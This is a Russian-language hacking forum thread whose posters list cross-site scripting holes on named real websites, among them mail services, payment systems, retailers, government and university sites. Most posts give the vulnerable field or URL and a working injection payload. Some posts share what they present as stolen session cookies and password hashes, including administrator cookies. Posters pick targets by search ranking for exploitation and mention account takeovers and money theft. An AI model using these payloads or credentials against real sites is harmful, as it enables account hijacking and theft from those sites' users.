как извлечь из этой дыры пользу не знаю Если есть идеи напишите плз

http://www.it-monster.ru/register/typecandidate/

Уязвимое поле ICQ UIN

">alert(/xss/)

http://www.bcb.gov.br/?id=MINUTES&ano=%3Cscript%3Ealert('XSS')%3C/script%3E

Раздел сайта в DMOZ > Society > Government > Finance > Central_Banks

ТИЦ90 PR8

P.S Надеюсь модераторы оставят

Активная XSS на Mail.Ru в теле письма.

/readmsg_translate?id=

[QUOTE="None"]

" background='javascript:alert("opera")'>
" style="width:1000px; height:1000px;" onmouseover='alert("firefox")'>

" background='javascript:alert("opera")'>
" style="width:1000px; height:1000px;" onmouseover='alert("firefox")'>

intellectmoney.ru

платежная система которая стоит вконтакте.

ТИЦ: 160

PR: 3

Бага находится по адресу:

https://intellectmoney.ru/ru/enter/user_paycards/index.php

в названии карты ставим любой html код, фильтрация отсутствует

к примеру можно выполнить alert()

XSS у webmoney!

активная XXS уязвимость на сайте: merchant.webmoney.ru

итак по порядку!

1. https://merchant.webmoney.ru нужно авторизовать WMID

2. перейти по ссылке: Настройки (https://merchant.webmoney.ru/conf/purses.asp)

3. выбрать произвольный кошелек и кликнуть по ссылке: настроить (ссылка вида: https://merchant.webmoney.ru/conf/purse.asp?p=ВАШ_КОШЕЛЕК)

4. в поля: Result URL, Success URL, Fail URL, вписать: (">alert())

5. сохранить

---------------------------------------------------

Администрации об этой сообшике сообщенно! возможно скоро прекратит свое существование

------------ UPD---------------------------------

админы вэбмани ответили, что это так и задумывалось =)))) пользуемся наздоровье

Крупный треккер Украины. Тиц 100,Я Rank 3/6,PR 5.

http://pslan.kiev.ua/downloadit.php?id=171462&name=%3Ci%3Et00z%3C/i%3E

Уязвим параметр name.Для просмотра нужна регистрация.

Чтоб не регится,можем юзать уже краденые печеньки :


uid=403942
pass=672b01c07e1347405b5dd9127aecee24

~

Акк модератора уже в наличии

Pentagon Library

http://www.whs.mil/library/dir.html

POST запросом в поле "Area Code"

">alert(/xss/)

U.S. Government Printing Office

тута уже get

уязвимо два параметра

http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=alert(/xss/)&docid=">alert(/xss/)

сайт- http://victorov.su/md5/

шифруем наш код в md5: ">alert();

http://www.fema.gov/library/viewRecord.do?id=%3Cscript%3Ealert%28%27XSS%27%29; %3C/script%3E

Google PR - 9

тИЦ - 180

http://www.salajeanul.ro/index.php?cmd=article

Отсутствует фильтрация входных данных в полях формы комментирования

Уязвимые поля


Nume - alert(/xs/)
Subject - alert(/xs/)
Subiect: - alert(/xs/)
Comentariu: - alert(/xs/)

БГУ (Минск)

http://phone.bsu.by/

Уязвимые поля:

"ФИО" - ">alert(/1/)

"Подразделение" - ">alert(/1/)

Active XSS

http://www.ayda.ru/

Требуется регистрация.

если лень делать временное мыло, то

http://www.ayda.ru/stories/write_story.php

Добавляем историю и не надо подтверждать регу.

профиль http://www.ayda.ru/my/profile.php

Уязвимое поле:

* Имя: Vladconsole.log("asd")

Active XSS

https://spb.shop.megafon.ru/

Требуется регистрация.

https://spb.shop.megafon.ru/setup/delivery_info.html

Уязвимое поле - адрес

http://s09.radikal.ru/i182/1109/85/c73c08f9abbc.png

http://s003.radikal.ru/i202/1109/d3/315997d69e07.png

Active XSS

http://www.kupikupon.ru/contact

Яндекс тИЦ - 350

Пр - 3

Уязвимы все поля.

http://s009.radikal.ru/i307/1109/0b/abe05f5d9321.png

Сайт http://www.cskabasket.com/

Постим коммент


alert ();

Провайдер Казахстана

http://cabinet.megaline.kz/billing-dealer/restore-password.do

Вводим в поле "Шаг 1":


еб*нутыйМде. Еще провайдером называются... Совести

Ну и результат:

http://keep2.me/files/5d7d2b34fc53898cfbfc5cf94f394b0c/1.PNG

P.S. Еще года два назад заметил эту XSS, до сих пор живa

Еще один скидочный сервис от меня)))

Active XSS:

http://bigbuzzy.ru/

Уязвимость в Личном кабинете. В поле Имя и Фамилия( в самом кабинете фильтруются символы при выводе...а в акциях нет.

Яндекс тИЦ (CY) 220

Alexa Rank 11,757 -9,013

Google PageRank (PR) 4

http://s14.radikal.ru/i187/1109/16/ea02c3ac0b99.png

http://s51.radikal.ru/i133/1109/c5/070307af798c.png

Active XSS

http://www.directadvert.ru/user/

Яндекс тИЦ (CY) 190

Alexa Rank 1,697 -286

Google PageRank (PR) 5

Хосты 542,037

http://www.liveinternet.ru/stat/directadvert.ru/

Уязвимы все поля при создании рекламной компании.

http://s007.radikal.ru/i300/1109/72/7d9830dc7e7c.png

Active XSS

биржа трафика- http://www.alltraf.com/

(в определенных кругах - популярна и очень странно что тиц 0)

При создании рекламной компании уязвимо поле с урлом.

http://s41.radikal.ru/i092/1109/96/29211009cc7b.png

а вот и куки админке.


http://www.alltraf.com/adminchik.php?rek=1 MyAdm=230;%20MyAdminka=7900;%20name=admins;%20pwd= 13e913ec23951fa91fae1fb31f7717a91f7023582328

Active XSS

Сайт продажи электронных билетов - достаточно поппулярный

e-traffic.ru

http://s48.radikal.ru/i122/1110/9d/2a2ac6c00ce8.jpg (http://www.radikal.ru)

PR = 0

Тиц = 30

Админка тут - /admin/

Уязвимые поля:

Имя = alert('a4at')

Отчество = alert('a4at')

html5demos.com (http://html5demos.com)

PR = 6

ТиЦ = 40

Множественные уязвимости:

http://html5demos.com/postmessage

http://html5demos.com/postmessage2

http://html5demos.com/storage

​

Вставляем в поля




и радуемся!

http://dl.dropbox.com/u/17488858/Screenshot-36.png

Вот ещё:

http://html5demos.com/drag-anything​Копируем нашу ксс и переносим в поле для драг-н-дропа.

http://dl.dropbox.com/u/17488858/Screenshot-37.png

procool.ru/brainfuck/ - интерпритатор брейнфака PR-2

Выбираем "Из брейнфака" и вставляем:


++++++++++[>+++>+++++++++++>++++++++++>++++++++++++>++++>++++++>+++++++++>>>>>.-.++++++.>>>++.>+++++++.>>>++++.>>.>>>>>+++.-------.++.>>>++.-.>>>>>--.>>>>>+.>>-.+++.>>+++++.>----..>>>----.>--.>>--.>++.>>++.

http://dl.dropbox.com/u/17488858/Screenshot-40.png

и получаем XSS самым извращеннымспособом!

эта пассивка...!


Okay

Социальная сеть мёртвых.

pomnipro.ru

Уязвимо поле ввода комментариев. (только для залогинённых)

И в своём профиле все поля.

Ничего не фильтруется.

http://pomnipro.ru/memorypage/show/834/

За 2 месяца так и не додумались пофиксить, хотя о баге знают.

За Русского и Эстонского пилота. Часть 2 (Coming Soon)

Site: http://www.joblist.tj/

1. Добавляем Вакансию: http://www.joblist.tj/addvacancy.php

2. Утверждаем Вакансию: http://www.joblist.tj/moderation/

3. Profit!

Уязвимые строки:


"Название организации"
"Должность"
"Требования к кандидату"
"Условия труда"
"Задачи и обязанности рабочего"
"Телефон"
"Факс"
"Email"
"Web"

Sploit:


">alert(/mix0x0/)

Site: http://www.tajtube.tj

Поле: Сайт

Sploit:


">alert(/mix0x0/)

Kolibry CMS

Target: Kolibry CMS v.0.3.1

Info: Persistent XSS подвержены поля: “Город”, “Другая информация”, “Подпись”, в разделе “Личные данные”.

Info: Persistent XSS в поле “Тема сообщения”, раздела “Личные сообщения”.

http://imglink.ru/pictures/11-11-11/66c092d493fe148084717b4a5f6595b2.jpg

dom2.ru

Без комментариев. Все знают, что это

Яндекс тИЦ (CY) 600

Google PageRank (PR) 6

Любого пользователя можно "поздравить", отправив ему в ЛС открытку (даже без авторизации). Создаются открытки и добавляются в общий каталог также без авторизации.

Уязвимо название открытки, которое вводится, после нажатия "сохранить" в редакторе.

Пример:

dom2.ru/community/users/123/send-gift/83730643

123 - ID пользователя, которому отправляется сообщение.

83730643 - ID открытки.

http://www.
sonyericsson.com
/xperianordic/index-modal.php?cc=se&lc=sv&item=%22%3E%3Cscript%3Ealert%28%27lol%27%29%3C/script%3E


Эмм молодой_человек/леди... Вы знаете отличия активных ХСС от пассивных ?? Знаете ? А зачем тогда постите ЭТО ?

З.Ы. Прошу модеров принять адекватные действия.

spooo.ru

http://spooo.ru/users/registration/

Уязвимы поля "Имя:", "Фамилия:"

">alert(/XSS/)

ТИЦ: 90 Pr: 2

nvhost.ru - хостинг

http://nvhost.ru/domains.php

Уязвимо поле проверки домена.

">alert(/XSS/)

ТИЦ: 150 Pr: 4

Прошу создать тему с пассивными XSS на популярных сайтов.


Абсолютно не вижу смысла. Большинству народу не нужны пассивки, если они не почтовиках. А тому кому нужны - сам найдёт на нужном домене.

SIXSS


http://www.playonline.com.ua/game.php?id=1313%29--+%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

ой завтыкал... это ж скуля

http://www.baraholka.ru

http://www.baraholka.ru/?go_id=accadverts

Уязвимое поле:

Имя


">alert('xss')



http://s42.radikal.ru/i098/1111/c1/a10874129725.jpg

http://www.povarenok.ru/

Заходим , создаем рецепт

Уязвимое поля:

Ингредиенты


">alert('xss')

http://www.jobfair.ru/

Создаем анкету:

Уязвимые поля

Место рождения

Имя

Отчество

Фамилия

Факультет

Специализация

Пример (http://www.jobfair.ru/anket_for_print/40965/)


">alert('xss')

http://home-cs.ru/

Регистрируемся , заходим в профиль ->Настройки->

Уязвимые поля:

Процессор

Клавиатура

Мышка

Наушники

Пример (http://home-cs.ru/profile/Grazo/)


">alert('xss')

http://betcityru.com/register.php

Уязвимо почти каждое поле!

http://s010.radikal.ru/i312/1112/95/ff8897ae3112.jpg

Недавно нашел в булкиных хаках xss, вот привожу пример.

Сайт: mixfight.ru

Тиц: 650

Пр: 4

Уязвимый модуль: opinion.php

- opinion.php?do=about&userid=1665

Воровать куки админа не захотел. Ну их ...

http://s010.radikal.ru/i311/1112/67/09b2e2fa122b.png

сама xsska

/showpost.php?p=2953252&postcount=138

Та же бага, только у них идет с фиксом.

Сайт: http://domenforum.net

Тиц: 250

Пр: 3

Уязвим скрипт opinion.php поле добавления.

Фильтр режет теги, но внутри инпута можно работать.

http://s49.radikal.ru/i125/1112/0f/3c1b9be2a60f.png

XSS blogspot.com
Пример:
http://%username%.blogspot.com/


blogspot.com и %username%.blogspot.com - разные домены

Если у меня есть сайт с доменом example.com, на который я могу заливать любой JS-код (мой же сайт), это не значит, что я нашел активку в доменной зоне .com.

КАСАЕТСЯ ВСЕМ!

ПЕРЕД ТЕМ КАК ПОСТИТЬ, ЕЩЕ 10 РАЗ ПРОЧТИТЕ ПЕРВЫЙ ПОСТ

ТУТ ПОСТИМ ТОЛЬКО ACTIVE XSS И ТОЛЬКО НА ИЗВЕСТНЫХ САЙТАХ.



//за многакратное нарушение будете заминусованы или прямо в бан =\ задели уже

http://steamcommunity.com

XSS в событиях группы.

Уязвимое поле "Название события:"


">alert(/XSS/)

http://s55.radikal.ru/i147/1201/8d/640cc479ef7ct.jpg (http://radikal.ru/F/s55.radikal.ru/i147/1201/8d/640cc479ef7c.jpg.html)

zzima.com | Active xss

Тиц: 475;

Пр: 4;

При создании группы(http://www.zzima.com/createGroup)

Отсутствует фильтрация в поле "Веб сайт".

http://s018.radikal.ru/i503/1201/88/b12614158317.png

+ Там есть функция - пригласить в группу.

tiu.ru

tiu.ru

тиц 5600

траф 40 000~

http://s52.radikal.ru/i138/1201/88/c6cad2352d91.jpg

1) Заходим на сайт

2) сверху жмякаем "Добавить компанию"

3) Уязвимое поле "Название компании"

а вообще все поля уязвимы, только надо шифроваться

Russia.ru

Активная xss в теле письма на russia.ru

Сайт Почта (https://mail.russia.ru/)

http://imglink.ru/thumbnails/28-01-12/948c6280b72ff06c9c2cfb5f0ef17ea5.jpg (http://imglink.ru/show-image.php?id=962c3873c47e43bbb023d2486dcf61c2)

В теле письма отправляем код

Активная XSS на qchat.su

Уязвимое поле Тема билета


">alert(/XSS/)

http://imglink.ru/thumbnails/29-01-12/28db449b8ddba1eec7f920f1f7463f42.jpg (http://imglink.ru/show-image.php?id=71d33d8d0a9c78be6f15592b575418a1)

Сайт снова открыт, на главной странице сообщение о взломе аккаунтов и переводе с них денег. Уязвимость закрыта. Ищу другую

берлога.net - развлекательный сайт, торрент-трекер

pr: 3

тиц: 250

статистика согласно бигмирнет

хостов Сегодня 62 803

хостов Вчера 143 702

уязвимое поле, в анкете «музыкальные предпочтения»

http://i.imgur.com/pbhGy.png

также на сайте csrf на смену пароля, и множество пасивок, обход лимита на добавление релизов, заливка файлов php вместо картинок (загрузка через флешплеер, и фильтрация расширений только при выборе, то есть на js) только вот не выполняются они, а скачиваются в оригинале, но может кто найдёт lfi

molnet.ru - статьи по жизненным ситуациям в Москве

тИЦ - 900

Уязвимый код: alert('XSS')

1) Регистрируемся

2) Заходим в свой профиль

3) Добавляем комментарий с уязвимым кодом и обновляем страницу

http://s017.radikal.ru/i428/1202/8e/89cc837afa10.png

М.Видео – бытовая техника и электроника по доступным ценам. Удобный интернет-магазин.

тИЦ - 2200

Добавляем уязвимый код:


http://www.mvideo.ru/homeshop/?p=cart&step=0&_recount=0&droppayment=1&delivery_type_20024096=1&ids%5B20024096%5D=1&cert_cb%5B20024096%5D=0&city_zones_id=0&promo_code_value=">alert('xss')&promo_code=1

Переходим сюда:


http://www.mvideo.ru/homeshop/?p=cart

+ XSS из-за недостаточной фильтрации в Cookie

Уязвимое место:


phorum_name:">alert('xss');

Переходим в любую тему на форуме М.Видео и XSS выполняется.

Скриншот:

http://s018.radikal.ru/i523/1202/76/0f279df239f4.jpg

+ Еще одна активка

1) Регистрируемся в системе

2) Заходим в свой профиль

3) Добавляем адрес доставки

Уязвимые поля: Корпус (cтроение), Подъезд, Телефон 2, Факс

Уязвимый код:


">alert('xss')

Скриншот:

http://s017.radikal.ru/i431/1202/27/c86245881498.jpg

Serva4ok - игровой хостинг.

тИЦ - 100

1) Регистрируемся на сайте

2) Создаем свою команду

После создания команды, переходим в Наш состав => [подробный список]

Редактировать игрока => id[ваш_id] => Выполнить

Уязвимое поле: Отзыв капитана команды

Уязвимый код:


alert('xss')

Пример:


http://www.serva4ok.ru/index.php?do=profiler&act=fight_logs&file_id=82546

http://s018.radikal.ru/i525/1202/c5/21d0dd5ed553.jpg

Olike - Бесплатные сердечки ВКонтакте (популярен среди любителей "лайков").

Уязвимый код:


">alert(/xss/)

Жмякаем на "Использовать Лайки"

В поле "Название страницы" пишем наш уязвимый код.

После чего переходим в "Мои Заказы" и наша XSS выполняется.

http://s018.radikal.ru/i511/1202/90/da06d6b46b94.jpg

Drive2.ru - все автомобили мира: отзывы, фото, видео, блоги.

тИЦ - 1100

Уязвимый код:


alert('xss')

1) Проходим авторизацию на сайте

2) Жмякаем "Написать" => "в мой блог"

3) Добавляем уязвимый код в поле "Ключевые слова (метки)"

http://s018.radikal.ru/i514/1202/1a/dd01ab67fc0d.jpg

Wellpay - система приятных электронных платежей.

Тип: DOM-based

Уязвимый код:


alert('xss')

1) Переходим в раздел "Мои кошельки".

2) Меняем название нашего кошелька на уязвимый код.

http://s017.radikal.ru/i444/1202/7b/da33de967cb6.png

Спрашивай.ру - популярный ресурс у девочек вконтакте и их поклонников(так же и адекватный народ сидит, но зачем?)

url: http://sprashivai.ru

тИц: 275

Pr: 4

Уязвимое поле записи своих "мыслей".

Фильтруются теги при постинге, но c помощью


" autofocus/onfocus="alert(123)"

для тега input можем выполнить произвольный js код.

http://s017.radikal.ru/i413/1204/c4/9ff22ad456ae.png

Предотвращая вопросы в ЛС -

http://s019.radikal.ru/i610/1204/98/eb508659245a.png

Доменная зона Vip-file.Нашел 25.11.2009, еще жива


http://sms4file.com/ftp/autor.php

Логин: ">alert(/t3cHn0iD/)
Пароль: ">alert(/t3cHn0iD/)

.directadvert.ru

Тизерная сеть directadvert.ru

Уязвимые поля: Название тизера,текст тизера

код


alert(XSS)

Тизерная сеть directadvert.ru
Уязвимые поля: Название тизера,текст тизера
код


боян

/showpost.php?p=2841182&postcount=440

http://www.metalinfo.ru/

комментарии к новостям

алерты проходят по имени и тексту сообщения

alert()

XSS mamba.ru

Яндекс тИЦ 3 100

Пр 6

Понравилась сама реализация

У мамбы есть ифрейм приложение для контакта.

Так вот, при аплоаде фотки с альбома(ВКОНТАКТЕ) возможен выбор альбома(из существующих у пользователя)

Называем альбом alert(тэкст)

Заходим, обновляемся и вуаля...

http://s019.radikal.ru/i643/1204/47/4bb4820dad3c.png

При том, что на самом сайте дико фильтруют все что можно

Практической реализации почти нет. только если для соц инжа.

Предупредил разрабочтиков.


задача поставлена в работу.
Сделается как время будет, спасибо.
Какой-то серьезной угрозы для безопасности наших пользователей это вряд ли представляет.


Не знают ребята, что такое имидж.

blogger.com

XSS DOM-BASED

Дефолтный шаблон.

Создаём новость -> добавляем алерт -> сохраняем -> выбираем вид: "Timeslide" или "Magazine" -> Profit!

http://storage8.static.itmages.ru/i/12/0426/s_1335460842_6895865_4d4151bcf3.png (http://itmages.ru/image/view/498188/4d4151bc)

http://storage1.static.itmages.ru/i/12/0426/s_1335460964_9704902_73e866f60a.png (http://itmages.ru/image/view/498190/73e866f6)

http://storage4.static.itmages.ru/i/12/0426/s_1335461016_6521637_3c235d60a1.png (http://itmages.ru/image/view/498193/3c235d60)

XSS mamba.ru
Яндекс тИЦ
3 100
Пр 6
Понравилась сама реализация
У мамбы есть ифрейм приложение для контакта.
Так вот, при аплоаде фотки с альбома(ВКОНТАКТЕ) возможен выбор альбома(из существующих у пользователя)
Называем альбом alert(тэкст)
Заходим, обновляемся и вуаля...
http://s019.radikal.ru/i643/1204/47/4bb4820dad3c.png
При том, что на самом сайте дико фильтруют все что можно
Практической реализации почти нет. только если для соц инжа.
Предупредил разрабочтиков.
Не знают ребята, что такое имидж.



Прила на совершенно другом домене. Так что по сути это ничего не дает

Kanobu.ru xss

И так все наверно слышали это сайт ( kanobu.ru ) и xss скорее всего старая...но и была пассивка но ее прикрыли)

и так уязвимые поля:

Skype

Twitter

">alert('XSS')

http://img854.imageshack.us/img854/7696/xsskanobu.jpg

также можно выполнять html код

пример:">ДА ДА ДА

http://img822.imageshack.us/img822/4086/htmlteg.jpg

популярный сервис Спрашивай (http://sprashivai.ru/)

xss в поле имя при регистрации


">alert(/xss/)
alert('xss')
">

http://212.ru/

Регистрируемся , заходим в профиль ->Настройки->

Уязвимые поля:



Имя


Пример (http://s42.radikal.ru/i095/1205/a5/54d8aa064941.jpg)


">alert('xss')

интернет-магазин: gamepost.ua

тИЦ: 10

PR: 3

Ни одно поле при регистрации не фильтруется.

Уязвимо поле: Телефон

http://s2.ipicture.ru/uploads/20120527/bUHoaItd.png

интернет магазин firstspring.ru

В профиле уязвимы все поля кроме E-mail

http://img805.imageshack.us/img805/528/20120610180344.png

XSS rambler.ru:

Логинимся на рамблере, http://foto.rambler.ru/photos/add/?album_id= загружаем фото

Редактируем описание фото (действия с фото->редактировать) на:

1'alert("Chymenik - this is XSS! +1rep")

Пример: http://foto.rambler.ru/photos/5051d95d-5cdd-e5af-2988-b7f96b35aa7c/

mingorsud. gov.by



h_tp://mingorsud.gov.by/syst em/tmp ls/pages/pismo/fi z.p hp

Уязвимое поле: post_address

вставляем : " onmouseover=prompt(943147) bad="

P.S.

/system/tmpls/pages/pismo/ur.php

Уязвимое поле: post_address

http://xakep.ru/articles/map/default.asp

http://img.im/i/l1v2rz

Вставляем код в любом поле и нажимаем на Отправить и вы суперхакер.

http://russen.eu

Пример (http://rghost.ru/44101767.view)

Сама уязвиость (http://russen.eu/gallery_albums_user.php?user_id=107235)

Уязвимое поле "О себе " Сайт находиться на 2 месте в топ mail "Знакомства"

http
://
russen
.eu
Пример (http://rghost.ru/44101767.view)
Уязвимое поле "О себе " Сайт находиться на 2 месте в топ mail "Знакомства"


Приложите пример вставляемого скрипта пожалуйста.

https://www.abacuscapital.ky


https://www.abacuscapital.ky/contact.asp?Email=CodeFail&EmailAddress=%27%20onmouseover%3dprompt%28958726%2 9%20bad%3d%27&MessageBody=1%3C%2ftextarea%3E1%3CScRiPt%20%3Eprom pt%28978443%29%3C%2fScRiPt%3E

а точнее, уязвимы поля EmailAddress и MessageBody

Тож самое в: /process_form.asp

уязвимы поля EmailAddress и MessageBody